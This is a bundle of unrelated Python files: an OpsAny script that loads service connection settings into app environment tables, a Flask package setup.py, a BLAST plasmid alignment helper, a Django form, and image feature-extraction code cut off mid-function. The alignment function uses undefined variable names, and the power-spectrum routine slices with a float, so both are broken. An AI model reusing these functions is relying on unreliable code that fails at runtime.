{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_WORKBENCH_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
]
},{
"app_code": "rbac",
"env": [
# RBAC count 4
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_RBAC_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
]
},{
"app_code": "monitor",
"env": [
# MONITOR count 10
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_MONITOR_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_MONITOR_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
{"key": "ELASTIC_SEARCH_USERNAME", "value": replace_str(config_dict.get('elasticsearch').get("ELASTIC_SEARCH_USERNAME")), "env_scope": "all", "intro": "es username"},
{"key": "ES_PASSWORD", "value": replace_str(config_dict.get('elasticsearch').get("ES_PASSWORD")), "env_scope": "all", "intro": "es password"},
{"key": "ES_SERVER_IP", "value": replace_str(config_dict.get('elasticsearch').get("ES_SERVER_IP")), "env_scope": "all", "intro": "es host"},
{"key": "ELASTIC_PORT", "value": replace_str(config_dict.get('elasticsearch').get("ELASTIC_PORT")), "env_scope": "all", "intro": "es port"},
{"key": "ELASTIC_SEARCH_INDEX", "value": replace_str(config_dict.get('elasticsearch').get("ELASTIC_SEARCH_INDEX")), "env_scope": "all", "intro": "es index"},
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
]
},{
"app_code": "control",
"env": [
# CONTROL count 13
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_CONTROL_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_CONTROL_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
{"key": "REDIS_HOST", "value": replace_str(config_dict.get("redis").get("REDIS_SERVER_IP")), "env_scope": "all", "intro": "redis host"},
{"key": "REDIS_PORT", "value": replace_str(config_dict.get("redis").get("REDIS_PORT")), "env_scope": "all", "intro": "redis port"},
{"key": "REDIS_PASSWORD", "value": replace_str(config_dict.get("redis").get("REDIS_SERVER_PASSWORD")), "env_scope": "all", "intro": "redis password"},
{"key": "ROSTER_FILE_URL", "value": replace_str(config_dict.get('opsany_saas').get("ROSTER_FILE_URL")), "env_scope": "all", "intro": "roster file path"},
{"key": "SALT_SSH_FILE_URL", "value": replace_str(config_dict.get('opsany_saas').get("SALT_SSH_FILE_URL")), "env_scope": "all", "intro": "salt ssh file path"},
{"key": "ANSIBLE_HOST_KEY_CHECKING", "value": replace_str(config_dict.get("opsany_saas").get("ANSIBLE_HOST_KEY_CHECKING")), "env_scope": "all", "intro": "ansible vs host checking"},
# {"key": "DEFAULT_USER_ICON", "value": read_install_config.get("DEFAULT_USER_ICON"), "env_scope": "all", "intro": "user default icon"},
]
},{
"app_code": "devops",
"env": [
# devops count 8
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_DEVOPS_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "MONGO_HOST", "value": replace_str(config_dict.get('mongodb').get("MONGO_SERVER_IP")), "env_scope": "all", "intro": "mongo host"},
{"key": "MONGO_PORT", "value": replace_str(config_dict.get('mongodb').get("MONGO_PORT")), "env_scope": "all", "intro": "mongo port"},
{"key": "MONGO_PASSWORD", "value": replace_str(config_dict.get('mongodb').get("MONGO_DEVOPS_PASSWORD")), "env_scope": "all", "intro": "mongo password"},
# {"key": "DEFAULT_USER_ICON", "value": read_install_config.get("DEFAULT_USER_ICON"), "env_scope": "all", "intro": "user default icon"},
]
},{
"app_code": "bastion",
"env": [
# bastion count 8
{"key": "UPLOAD_PATH", "value": replace_str(config_dict.get('opsany_saas').get("UPLOAD_PATH")), "env_scope": "all", "intro": "uploads path"},
{"key": "MYSQL_PASSWORD", "value": replace_str(config_dict.get('mysql').get("MYSQL_OPSANY_BASTION_PASSWORD")), "env_scope": "all", "intro": "mysql password"},
{"key": "MYSQL_HOST", "value": replace_str(config_dict.get('mysql').get("MYSQL_SERVER_IP")), "env_scope": "all", "intro": "mysql host"},
{"key": "MYSQL_PORT", "value": replace_str(config_dict.get('mysql').get("MYSQL_PORT")), "env_scope": "all", "intro": "mysql port"},
{"key": "REDIS_HOST", "value": replace_str(config_dict.get("redis").get("REDIS_SERVER_IP")), "env_scope": "all", "intro": "redis host"},
{"key": "REDIS_PORT", "value": replace_str(config_dict.get("redis").get("REDIS_PORT")), "env_scope": "all", "intro": "redis port"},
{"key": "REDIS_PASSWORD", "value": replace_str(config_dict.get("redis").get("REDIS_SERVER_PASSWORD")), "env_scope": "all", "intro": "redis password"},
{"key": "TERMINAL_TIMEOUT", "value": replace_str(config_dict.get("redis").get("TERMINAL_TIMEOUT")), "env_scope": "all", "intro": "terminal timeout"},
]
}
]
class PaasApptag(Base):
__tablename__ = 'paas_apptags'
id = Column(INTEGER(11), primary_key=True)
name = Column(String(20), nullable=False, unique=True)
code = Column(String(30), nullable=False, unique=True)
index = Column(INTEGER(11), nullable=False)
class PaasApp(Base):
__tablename__ = 'paas_app'
id = Column(INTEGER(11), primary_key=True)
name = Column(String(20), nullable=False, unique=True)
code = Column(String(30), nullable=False, unique=True)
introduction = Column(LONGTEXT, nullable=False)
creater = Column(String(20), nullable=False)
created_date = Column(DateTime, index=True)
state = Column(SMALLINT(6), nullable=False)
is_already_test = Column(TINYINT(1), nullable=False)
is_already_online = Column(TINYINT(1), nullable=False)
first_test_time = Column(DateTime, index=True)
first_online_time = Column(DateTime, index=True)
language = Column(String(50))
auth_token = Column(String(36))
tags_id = Column(ForeignKey('paas_apptags.id'), index=True)
deploy_token = Column(LONGTEXT)
is_use_celery = Column(TINYINT(1), nullable=False)
is_use_celery_beat = Column(TINYINT(1), nullable=False)
is_saas = Column(TINYINT(1), nullable=False)
logo = Column(String(100))
tags = relationship('PaasApptag')
class EngineApp(Base):
__tablename__ = 'engine_apps'
id = Column(INTEGER(11), primary_key=True)
name = Column(String(20), nullable=False)
logo = Column(String(100), nullable=False)
app_code = Column(String(100), nullable=False, unique=True)
app_lang = Column(String(100), nullable=False)
app_type = Column(String(100), nullable=False)
is_active = Column(TINYINT(1), nullable=False)
created_at = Column(DateTime, nullable=False)
updated_at = Column(DateTime, nullable=False)
class EngineAppEnv(Base):
__tablename__ = 'engine_app_envs'
id = Column(INTEGER(11), primary_key=True)
mode = Column(String(200), nullable=False)
key = Column(String(200), nullable=False)
value = Column(String(200), nullable=False)
created_at = Column(DateTime, nullable=False)
updated_at = Column(DateTime, nullable=False)
bk_app_id = Column(ForeignKey('engine_apps.id'), nullable=False, index=True)
bk_app = relationship('EngineApp')
class PaasAppEnvvar(Base):
__tablename__ = 'paas_app_envvars'
__table_args__ = (
Index('paas_app_envvars_app_code_36685348c7256adf_uniq', 'app_code', 'mode', 'name', unique=True),
)
id = Column(INTEGER(11), primary_key=True)
app_code = Column(String(30), nullable=False)
mode = Column(String(20), nullable=False)
name = Column(String(50), nullable=False)
value = Column(String(1024), nullable=False)
intro = Column(LONGTEXT)
class AddEnv:
def __init__(self):
cursor = sessionmaker(bind=db)
self.session = cursor()
self.envs = envs
def add_env(self):
for env in self.envs:
app = self.session.query(PaasApp).filter(PaasApp.code==env.get("app_code")).first()
if app:
env_list = env.get("env")
for env_dict in env_list:
key = env_dict.get("key")
value = env_dict.get("value")
env_scope = "prod"
env_query = self.session.query(EngineAppEnv).filter(
EngineAppEnv.bk_app_id==app.id,
EngineAppEnv.key==key
).first()
if not env_query:
create_query = EngineAppEnv(mode=env_scope, key=key, value=value,
created_at=datetime.datetime.now(),
updated_at=datetime.datetime.now(),
bk_app_id=app.id
)
self.session.add(create_query)
self.session.commit()
print("For {} create env info: key={} value={}".format(env.get("app_code"), key, value))
else:
self.session.query(EngineAppEnv).filter(
EngineAppEnv.id==env_query.id).update({
"mode": env_scope,
"key": key,
"value": value,
"updated_at": datetime.datetime.now(),
"bk_app_id": app.id
})
self.session.commit()
print("For {} update env info: key={} value={}".format(env.get("app_code"), key, value))
def add_env_v2(self):
for env in self.envs:
app_code = env.get("app_code")
env_list = env.get("env")
for env_dict in env_list:
env_query = self.session.query(PaasAppEnvvar).filter(
PaasAppEnvvar.app_code==app_code,
PaasAppEnvvar.name==env_dict.get("key")
).first()
if not env_query:
create_query = PaasAppEnvvar(app_code=app_code,
name=env_dict.get("key", ""),
value=env_dict.get("value", ""),
mode=env_dict.get("env_scope", "all"),
intro=env_dict.get("intro", ""),
)
self.session.add(create_query)
self.session.commit()
print("For {} create env info: key={} value={}".format(app_code, env_dict.get("key"),
env_dict.get("value")))
else:
self.session.query(PaasAppEnvvar).filter(
PaasAppEnvvar.id==env_query.id).update({
"mode": env_dict.get("env_scope", "all"),
"name": env_dict.get("key", ""),
"value": env_dict.get("value", ""),
"intro": env_dict.get("intro", ""),
"app_code": app_code,
})
self.session.commit()
print("For {} update env info: key={} value={}".format(app_code, env_dict.get("key"),
env_dict.get("value")))
if __name__ == '__main__':
AddEnv().add_env_v2()
print("ENV INPUT IS DONE, SUCCESS.")
|
import setuptools
setuptools.setup(
name="Flask-API-Framework",
version="0.0.3",
keywords="flask api framework",
description="Flask API Framework",
long_description="Please see the project links.",
project_urls={
"Documentation": "https://flask-api-framework.readthedocs.io/",
"Source": "https://github.com/thnee/flask-api-framework",
},
license="BSD-3-Clause",
author="Mattias Lindvall",
author_email="mattias.lindvall@gmail.com",
package_dir={"": "src"},
packages=["flask_api_framework"],
python_requires=">=3.7",
install_requires=[
"flask >= 2.0.0",
"marshmallow >= 3.14.0",
],
extras_require={
"test": [
"flask-sqlalchemy ~= 2.5.1",
"marshmallow-sqlalchemy ~= 0.28.0",
"flask-marshmallow ~= 0.14.0",
"pytest ~= 7.1.2",
"pytest-cov ~= 3.0.0",
"flake8 ~= 4.0.1",
"flake8-print ~= 5.0.0",
"flake8-bugbear ~= 22.4.25",
"black ~= 22.3.0",
"isort ~= 5.10.1",
"invoke ~= 1.7.1",
"tox ~= 3.25.0",
],
"build": [
"wheel ~= 0.37.1",
"twine ~= 4.0.0",
],
},
classifiers=[
# "Development Status :: 1 - Planning",
# "Development Status :: 2 - Pre-Alpha",
"Development Status :: 3 - Alpha",
# "Development Status :: 4 - Beta",
# "Development Status :: 5 - Production/Stable",
# "Development Status :: 6 - Mature",
# "Development Status :: 7 - Inactive",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
"Topic :: Software Development",
"Intended Audience :: Developers",
"Framework :: Flask",
],
)
|
import json
import xmltodict
import subprocess
import random
import string
import os
import os.path
import sys
class BlastPlasmid:
def __init__(self, plasmidSeq):
self.plasmidSeq = plasmidSeq
randomFileName = ''.join(random.choice(string.ascii_uppercase+string.digits) for _ in range(10))+".tmp"
self.fileName = randomFileName
self.result = None
self.filePath = os.path.join("tmp",randomFileName)
with open(self.filePath, "w") as f:
f.write('>seq1\n')
f.write(plasmidSeq)
f.write("\n")
def blast6(self, abiSeq):
randomFileName = os.path.join("tmp", ''.join(random.choice(string.ascii_uppercase+string.digits) for _ in range(10))+".tmp")
with open(randomFileName, "w") as f:
f.write('>seq2\n')
f.write(abiSeq)
f.write("\n")
process = subprocess.Popen(('blastn -subject {} -query {} -outfmt 6'.format(self.filePath, randomFileName)).split(' '), stdout=subprocess.PIPE, universal_newlines=True)
# out = process.communicate(input=abiSeq)[0]
out = process.communicate()[0]
#debug save xml
if out == '':
return {}
data = out.split(' ')
self.result = {'subFrom': data[8], 'subTo': data[9], 'queryFrom': data[6], 'queryTo': data[7]}
#sys.stderr.write(json.dumps(self.result))
#subprocess.call(['rm',self.filePath])
return self.result
def hasHits(self,dct):
return dct['BlastOutput']['BlastOutput_iterations']['Iteration']['Iteration_hits']!=None
def getHsp(self, dct):
hsp = dct['BlastOutput']['BlastOutput_iterations']['Iteration']['Iteration_hits']['Hit']['Hit_hsps']['Hsp']
return hsp
def getMatch(self, dct):
hits = dct['BlastOutput']['BlastOutput_iterations']['Iteration']['Iteration_hits']['Hit']
#length = hits['Hit_len']
hsp = hits['Hit_hsps']['Hsp']
if type(hsp) == list:
hsp = hsp[0]
qseq = hsp['Hsp_qseq']
midline = hsp['Hsp_midline']
hseq = hsp['Hsp_hseq']
return {"qseq":qseq,"midline":midline,"hseq":hseq}
def getOutput(self,dct):
if self.hasHits(dct):
hsp = self.getHsp(dct)
if type(hsp)==list:
hsp = hsp[0]
queryFrom = int(hsp['Hsp_query-from'])
queryTo = int(hsp['Hsp_query-to'])
hitFrom = int(hsp['Hsp_hit-from'])
hitTo = int(hsp['Hsp_hit-to'])
else:
queryFrom = int(hsp['Hsp_query-from'])
queryTo = int(hsp['Hsp_query-to'])
hitFrom = int(hsp['Hsp_hit-from'])
hitTo = int(hsp['Hsp_hit-to'])
return {"queryFrom":queryFrom,"queryTo":queryTo,"hitFrom":hitFrom,"hitTo":hitTo,"match":self.getMatch(dct),"message":"OK"}
else:
return {"message":"no hits"}
def reverseComplement(src):
dst = ""
d = {"A":"T","T":"A","C":"G","G":"C","c":'g','g':'c','a':'t','t':'a'}
for i in range(len(src)-1,-1,-1):
if src[i] in d:
dst+=d[src[i]]
else:
dst+=" "
return dst
def fullAlignment(original,abiSeq,plasmidSeq):
abiSeq = abiSeq.replace("\n","")
plasmidSeq = plasmidSeq.replace("\n","")
if 'queryFrom' in original and 'queryTo' in original:
if original['queryFrom'] ==1 and original['queryTo']==len(plasmidSeq):
return original
else:
oriQFrom = original['queryFrom']-1
oriQTo = original['queryTo']
oriHFrom = original['hitFrom']-1
oriHTo = original['hitTo']
add5 = plasmidSeq[:oriQFrom]
add3 = plasmidSeq[oriQTo:]
hitFrom = 0
hitTo = len(plasmidSeq)
qseq = add5+original['match']['qseq']+add3
if oriQFrom < oriQTo:
queryFrom = oriQFrom - len(add5)
queryTo = oriQTo + len(add3)
hseq = abiSeq[queryFrom:oriQFrom] + original['match']['hseq'] +abiSeq[oriQTo:queryTo]
else:
queryFrom = oriQFrom+ len(add5)
queryTo = oriQto - len(add3)
rcAbiSeq = reverseComplement(abiSeq)
rclen = len(rcAbiSeq)
hseq = rcAbiSeq[rcLen-queryFrom:rcLen-original['queryFrom']] + original['match']['hseq'] +AbiSeq[rcLen-original['queryTo']:rcLen-queryTo]
match = ""
#print oriQFrom
#print oriQTo
#print oriHFrom
#print oriHTo
#print add5,len(add5)
#print add3,len(add3)
#print queryFrom
#print queryTo
#print original['queryFrom']
#print original['queryTo']
#
for i in range(len(qseq)):
if qseq[i] == hseq[i]:
match+="|"
else:
match+=" "
return {"queryFrom":oriQFrom+1,"queryTo":oriQTo,"hitFrom":oriHFrom+1,"hitTo":oriHTo,"match":{"qseq":qseq,"midline":match,"hseq":hseq},"message":"OK"}
else:
return original
# if __name__ == "__main__":
# fullAlignmentFlag = False
# if len(sys.argv)>1:
# if sys.argv[1] == '-a':
# fullAlignmentFlag = True
# seq = sys.stdin.readline() #abi
# seq2 = sys.stdin.readline() #original
# b = BlastPlasmid(seq)
# dct = b.blast(seq2)
# output = b.getOutput(dct)
# if fullAlignmentFlag:
# output = fullAlignment(output,seq,seq2)
# sys.stdout.write(json.dumps(output))
# else:
# print __name__
|
from django.forms import ModelForm
from ..models import Project
class ProjectForm(ModelForm):
class Meta:
model = Project
fields = ('title','body','parent',)
def __init__(self, *args, **kwargs):
'''Uses the passed request to choices for parent projects'''
if kwargs['request']:
self.request = kwargs.pop('request')
super(ProjectForm,self).__init__(*args, **kwargs)
# Only top-level projects can be choices
query_set = Project.objects.filter(user=self.request.user,
parent=None)
# Exclude self instance from choices on UpdateView
if self.instance.pk is not None:
query_set = query_set.exclude(pk=self.instance.pk)
self.fields['parent'].queryset = query_set
else:
super(ProjectForm,self).__init__(*args, **kwargs)
self.fields['title'].widget.attrs.update({'class': 'form-control border border-dark',
'placeholder': 'Title',
'id': 'projectTitle',})
self.fields['body'].widget.attrs.update({'class': 'form-control border border-dark',
'placeholder': 'Body',
'id': 'projectBody',
'style': 'height: 8rem;',})
self.fields['parent'].widget.attrs.update({'class': 'form-select border border-dark',
'placeholder': 'Parent',
'id': 'projectParent',})
|
import multiprocessing
import operator
import os
from collections import defaultdict
from functools import partial
import cv2
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from PIL import Image
from skimage import feature
from sklearn.metrics.pairwise import euclidean_distances
from .base import BaseFeatureTransformer
class Saliency:
"""Generate saliency map from RGB images with the spectral residual method
This class implements an algorithm that is based on the spectral
residual approach (Hou & Zhang, 2007).
"""
def __init__(self, img, use_numpy_fft=True, gauss_kernel=(5, 5)):
"""Constructor
This method initializes the saliency algorithm.
:param img: an RGB input image
:param use_numpy_fft: flag whether to use NumPy's FFT (True) or
OpenCV's FFT (False)
:param gauss_kernel: Kernel size for Gaussian blur
"""
self.use_numpy_fft = use_numpy_fft
self.gauss_kernel = gauss_kernel
self.frame_orig = img
# downsample image for processing
self.small_shape = (64, 64)
self.frame_small = cv2.resize(img, self.small_shape[1::-1])
# whether we need to do the math (True) or it has already
# been done (False)
self.need_saliency_map = True
def get_saliency_map(self):
"""Returns a saliency map
This method generates a saliency map for the image that was
passed to the class constructor.
:returns: grayscale saliency map
"""
if self.need_saliency_map:
# haven't calculated saliency map for this image yet
if len(self.frame_orig.shape) == 2:
# single channel
sal = self._get_channel_sal_magn(self.frame_small)
else:
# multiple channels: consider each channel independently
sal = np.zeros_like(self.frame_small).astype(np.float32)
for c in range(self.frame_small.shape[2]):
small = self.frame_small[:, :, c]
sal[:, :, c] = self._get_channel_sal_magn(small)
# overall saliency: channel mean
sal = np.mean(sal, 2)
# postprocess: blur, square, and normalize
if self.gauss_kernel is not None:
sal = cv2.GaussianBlur(sal, self.gauss_kernel, sigmaX=8, sigmaY=0)
sal = sal ** 2
sal = np.float32(sal) / np.max(sal)
# scale up
sal = cv2.resize(sal, self.frame_orig.shape[1::-1])
# store a copy so we do the work only once per frame
self.saliencyMap = sal
self.need_saliency_map = False
return self.saliencyMap
def _get_channel_sal_magn(self, channel):
"""Returns the log-magnitude of the Fourier spectrum
This method calculates the log-magnitude of the Fourier spectrum
of a single-channel image. This image could be a regular grayscale
image, or a single color channel of an RGB image.
:param channel: single-channel input image
:returns: log-magnitude of Fourier spectrum
"""
# do FFT and get log-spectrum
if self.use_numpy_fft:
img_dft = np.fft.fft2(channel)
magnitude, angle = cv2.cartToPolar(np.real(img_dft), np.imag(img_dft))
else:
img_dft = cv2.dft(np.float32(channel), flags=cv2.DFT_COMPLEX_OUTPUT)
magnitude, angle = cv2.cartToPolar(img_dft[:, :, 0], img_dft[:, :, 1])
# get log amplitude
log_ampl = np.log10(magnitude.clip(min=1e-9))
# blur log amplitude with avg filter
log_ampl_blur = cv2.blur(log_ampl, (3, 3))
# residual
residual = np.exp(log_ampl - log_ampl_blur)
# back to cartesian frequency domain
if self.use_numpy_fft:
real_part, imag_part = cv2.polarToCart(residual, angle)
img_combined = np.fft.ifft2(real_part + 1j * imag_part)
magnitude, _ = cv2.cartToPolar(np.real(img_combined), np.imag(img_combined))
else:
img_dft[:, :, 0], img_dft[:, :, 1] = cv2.polarToCart(residual, angle)
img_combined = cv2.idft(img_dft)
magnitude, _ = cv2.cartToPolar(img_combined[:, :, 0], img_combined[:, :, 1])
return magnitude
def calc_magnitude_spectrum(self):
"""Plots the magnitude spectrum
This method calculates the magnitude spectrum of the image passed
to the class constructor.
:returns: magnitude spectrum
"""
# convert the frame to grayscale if necessary
if len(self.frame_orig.shape) > 2:
frame = cv2.cvtColor(self.frame_orig, cv2.COLOR_BGR2GRAY)
else:
frame = self.frame_orig
# expand the image to an optimal size for FFT
rows, cols = self.frame_orig.shape[:2]
nrows = cv2.getOptimalDFTSize(rows)
ncols = cv2.getOptimalDFTSize(cols)
frame = cv2.copyMakeBorder(
frame, 0, ncols - cols, 0, nrows - rows, cv2.BORDER_CONSTANT, value=0
)
# do FFT and get log-spectrum
img_dft = np.fft.fft2(frame)
spectrum = np.log10(np.abs(np.fft.fftshift(img_dft)))
# return for plotting
return 255 * spectrum / np.max(spectrum)
def plot_power_spectrum(self):
"""Plots the power spectrum
This method plots the power spectrum of the image passed to
the class constructor.
:returns: power spectrum
"""
# convert the frame to grayscale if necessary
if len(self.frame_orig.shape) > 2:
frame = cv2.cvtColor(self.frame_orig, cv2.COLOR_BGR2GRAY)
else:
frame = self.frame_orig
# expand the image to an optimal size for FFT
rows, cols = self.frame_orig.shape[:2]
nrows = cv2.getOptimalDFTSize(rows)
ncols = cv2.getOptimalDFTSize(cols)
frame = cv2.copyMakeBorder(
frame, 0, ncols - cols, 0, nrows - rows, cv2.BORDER_CONSTANT, value=0
)
# do FFT and get log-spectrum
if self.use_numpy_fft:
img_dft = np.fft.fft2(frame)
spectrum = np.log10(np.real(np.abs(img_dft)) ** 2)
else:
img_dft = cv2.dft(np.float32(frame), flags=cv2.DFT_COMPLEX_OUTPUT)
spectrum = np.log10(img_dft[:, :, 0] ** 2 + img_dft[:, :, 1] ** 2)
# radial average
L = max(frame.shape)
freqs = np.fft.fftfreq(L)[: L / 2]
dists = np.sqrt(
np.fft.fftfreq(frame.shape[0])[:, np.newaxis] ** 2
+ np.fft.fftfreq(frame.shape[1]) ** 2
)
dcount = np.histogram(dists.ravel(), bins=freqs)[0]
histo, bins = np.histogram(dists.ravel(), bins=freqs, weights=spectrum.ravel())
centers = (bins[:-1] + bins[1:]) / 2
plt.plot(centers, histo / dcount)
plt.xlabel("frequency")
plt.ylabel("log-spectrum")
plt.show()
def get_proto_objects_map(self, use_otsu=True):
"""Returns the proto-objects map of an RGB image
This method generates a proto-objects map of an RGB image.
Proto-objects are saliency hot spots, generated by thresholding
the saliency map.
:param use_otsu: flag whether to use Otsu thresholding (True) or
a hardcoded threshold value (False)
:returns: proto-objects map
"""
saliency = self.get_saliency_map()
if use_otsu:
_, img_objects = cv2.threshold(
np.uint8(saliency * 255), 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU
)
else:
thresh = np.mean(saliency) * 255 * 3
_, img_objects = cv2.threshold(
np.uint8(saliency * 255), thresh, 255, cv2.THRESH_BINARY
)
return img_objects
def get_dullness(img):
img = Image.fromarray(img)
# obtain the color palette of the image
palette = defaultdict(int)
for pixel in img.getdata():
palette[pixel] += 1
# sort the colors present in the image
sorted_x = sorted(palette.items(), key=operator.itemgetter(1), reverse=True)
light_shade, dark_shade, shade_count, pixel_limit = 0, 0, 0, 25
for i, x in enumerate(sorted_x[:pixel_limit]):
if all(xx <= 20 for xx in x[0][:3]): # dull : too much darkness
dark_shade += x[1]
if all(xx >= 240 for xx in x[0][:3]): # bright : too much whiteness
light_shade += x[1]
shade_count += x[1]
light_percent = light_shade / shade_count
dark_percent = dark_shade / shade_count
return {"light_percent": light_percent, "dark_percent": dark_percent}
def get_average_pixel_width(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
edges_sigma1 = feature.canny(gray, sigma=3)
apw = np.sum(edges_sigma1) / img.shape[0] / img.shape[1]
return {"average_pixel_width": apw}
def get_dominant_color(img):
pixels = img.reshape(-1, 3).astype("float32")
n_colors = 5
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 200, 0.1)
flags = cv2.KMEANS_RANDOM_CENTERS
_, labels, centroids = cv2.kmeans(pixels, n_colors, None, criteria, 10, flags)
palette = np.uint8(centroids)
quantized = palette[labels.flatten()]
quantized = quantized.reshape(img.shape)
dominant_color = palette[np.argmax(np.unique(labels))]
dominant_color = (dominant_color / 255).squeeze()
return {
"dominant_color_r": dominant_color[0],
"dominant_color_g": dominant_color[1],
"dominant_color_b": dominant_color[2],
}
def get_blurrness_score(img):
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
blurness_score = cv2.Laplacian(gray, cv2.CV_64F).var()
return {"blurness_score": blurness_score}
def get_shape(img):
return {"width": img.shape[0], "height": img.shape[1]}
def get_brightness_and_saturation_and_contrast(img):
def get_stats(img):
img = img.reshape(-1, 3)
return np.concatenate(
[img.mean(axis=0), img.std(axis=0), img.min(axis=0), img.max(axis=0)]
)
yuv = get_stats(cv2.cvtColor(img, cv2.COLOR_BGR2YUV))
hls = get_stats(cv2.cvtColor(img, cv2.COLOR_BGR2HLS))
result = {}
result.update({"yuv_stats_" + str(i): stats for i, stats in enumerate(yuv)})
result.update({"hls_stats_" + str(i): stats for i, stats in enumerate(hls)})
return result
def get_colorfullness(img):
(B, G, R) = cv2.split(img)
rg = np.absolute(R - G)
yb = np.absolute(0.5 * (R + G) - B)
(rb_mean, rb_std) = (np.mean(rg), np.std(rg))
(yb_mean, yb_std) = (np.mean(yb), np.std(yb))
std_root = np.sqrt((rb_std ** 2) + (yb_std ** 2))
mean_root = np.sqrt((rb_mean ** 2) + (yb_mean ** 2))
colorfullness = std_root + (0.3 * mean_root)
return {"colorfullness": colorfullness}
def get_interest_points(img):
fast = cv2.FastFeatureDetector_create()
kp = fast.detect(img, None)
return {"interest_points": len(kp)}
def get_saliency_features(img):
saliency = Saliency(img).get_saliency_map()
binary_saliency = np.where(saliency > 3 * saliency.mean(), 1, 0).astype("uint8")
prop_background = 1 - binary_saliency.mean()
n_components, output, stats, centroids = cv2.connectedComponentsWithStats(
binary_saliency
)
sizes = stats[:, -1]
countours = stats[:, :-1]
max_component_size = max(sizes) / img.shape[0] / img.shape[1]
bbox = countours[np.argmax(sizes)]
max_component_avg_saliency = saliency[bbox[1] : bbox[3], bbox[0] : bbox[2]].mean()
s = centroids / [img.shape[0], img.shape[1]]
dist = euclidean_distances(s)
mean_dist = dist[~np.eye(dist.shape[0], dtype=bool)].mean()
max_component_centorid = s[np.argmax(sizes)]
min_dist_from_third_points = min(
np.linalg.norm(max_component_centorid - [1 / 3, 1 / 3]),
np.linalg.norm(max_component_centorid - [1 / 3, 2 / 3]),
np.linalg.norm(max_component_centorid - [2 / 3, 1 / 3]),
np.linalg.norm(max_component_centorid - [2 / 3, 2 / 3]),
)
dist_from_center = np.linalg.norm(s - [0.5, 0.5], axis=1)
mean_dist_from_center = dist_from_center.mean()
sum_dist_from_center = dist_from_center.sum()
result = {
"prop_background": prop_background,
"n_components": n_components,
"max_component_size": max_component_size,
"max_component_avg_saliency": max_component_avg_saliency,
"mean_dist": mean_dist,
"min_dist_from_third_points": min_dist_from_third_points,
"mean_dist_from_center": mean_dist_from_center,
"sum_dist_from_center": sum_dist_from_center,
}
return result
def get_face_features(img, cascade_path):
cascade = cv2.CascadeClassifier(cascade_path)
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
facerect = cascade.detectMultiScale(
gray, scaleFactor=1.08, minNeighbors=1, minSize=(20, 20)
)
face_area = 0
face_area_prop = 0
if len(facerect) > 0:
